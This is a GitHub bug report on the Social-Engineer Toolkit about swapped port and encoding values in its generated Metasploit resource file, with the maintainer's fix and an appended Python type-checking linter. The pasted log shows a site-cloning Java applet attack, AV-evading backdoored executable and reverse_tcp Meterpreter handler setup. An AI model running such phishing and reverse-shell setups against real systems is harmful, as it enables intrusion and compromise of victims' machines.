trustedsec / social-engineer-toolkit

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

SET confuses lines #52

Closed jonahwest closed 10 years ago

jonahwest commented 10 years ago

First I thought I messed up the config file, but then I did 3 fresh installs and the problem persists (v 5.4.7).

(2) Website Attack Vectors
(1) Java Applet Attack Method
(2) Site Cloner
(2) Windows Reverse_TCP Meterpreter
(4) Backdoored Executable

It seems that SET confuses the lines in .set/meta_config. (Tried to disable EnableStageEncoding=OFF, but same results.)

Only the last try handler gets the correct values to the correct topic.

et:payloads> PORT of the listener [443]:
[] Generating x86-based powershell injection code for port: 22
[] Generating x86-based powershell injection code for port: 53
[] Generating x86-based powershell injection code for port: 443
[] Generating x86-based powershell injection code for port: 21
[] Generating x86-based powershell injection code for port: 25
[] Finished generating powershell injection bypass.
[] Encoded to bypass execution restriction policy...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[] Backdoor completed successfully. Payload is now hidden within a legit executable.


Web Server Launched. Welcome to the SET Web Attack.


[--] Tested on Windows, Linux, and OSX [--]
[] Moving payload into cloned website.
[] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...


   =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]

[_] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 22
EnableStageEncoding => 22
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 53
EnableStageEncoding => 53
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 443
EnableStageEncoding => 443
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 21
EnableStageEncoding => 21
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 25
EnableStageEncoding => 25
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/metaconfig)> exploit -j
[] Exploit running as background job.
msf exploit(handler) >

trustedsec commented 10 years ago

Thanks for the report. In src/payloads/powershell/prep.py there were two instances where I placed the wrong variable in there. All set and pushed in version 5.4.8. Thanks for the bug report.
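
The swapped values in the log above (`EnableStageEncoding` receiving a port number, `LPORT` receiving `false`) are the kind of defect a type check on the generated resource file catches before it reaches msfconsole. The following is an added example, not code from SET or from either commenter; `lint_resource`, `CHECKS` and the sample strings are hypothetical names and constructed input, and the boolean check deliberately accepts only `true`/`false`, the forms the log shows SET writing.

```python
import re

def _is_port(value):
    # A listener port must be a decimal integer in the TCP port range.
    return value.isdigit() and 1 <= int(value) <= 65535

def _is_bool(value):
    # Assumption: only the literal forms seen in the log are accepted here.
    return value.lower() in {"true", "false"}

# Option name (lowercased) -> (human-readable expectation, validator).
# Only options that appear in the log above are checked.
CHECKS = {
    "lport": ("a port number 1-65535", _is_port),
    "enablestageencoding": ("true or false", _is_bool),
    "exitonsession": ("true or false", _is_bool),
}

SET_LINE = re.compile(r"^\s*set\s+(\S+)\s+(.*?)\s*$")

def lint_resource(text):
    """Return (line_number, option, value, expected) for each mistyped option."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = SET_LINE.match(line)
        if not match:
            continue  # 'use', 'exploit -j', blank lines, etc.
        option, value = match.groups()
        check = CHECKS.get(option.lower())
        if check and not check[1](value):
            findings.append((number, option, value, check[0]))
    return findings

# Constructed samples mirroring one failing and one working handler block.
BROKEN = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.2
set EnableStageEncoding 22
set ExitOnSession false
set LPORT false
exploit -j
"""
GOOD = BROKEN.replace("EnableStageEncoding 22", "EnableStageEncoding false") \
             .replace("LPORT false", "LPORT 443")

if __name__ == "__main__":
    for number, option, value, expected in lint_resource(BROKEN):
        print(f"line {number}: {option} = {value!r}, expected {expected}")
```
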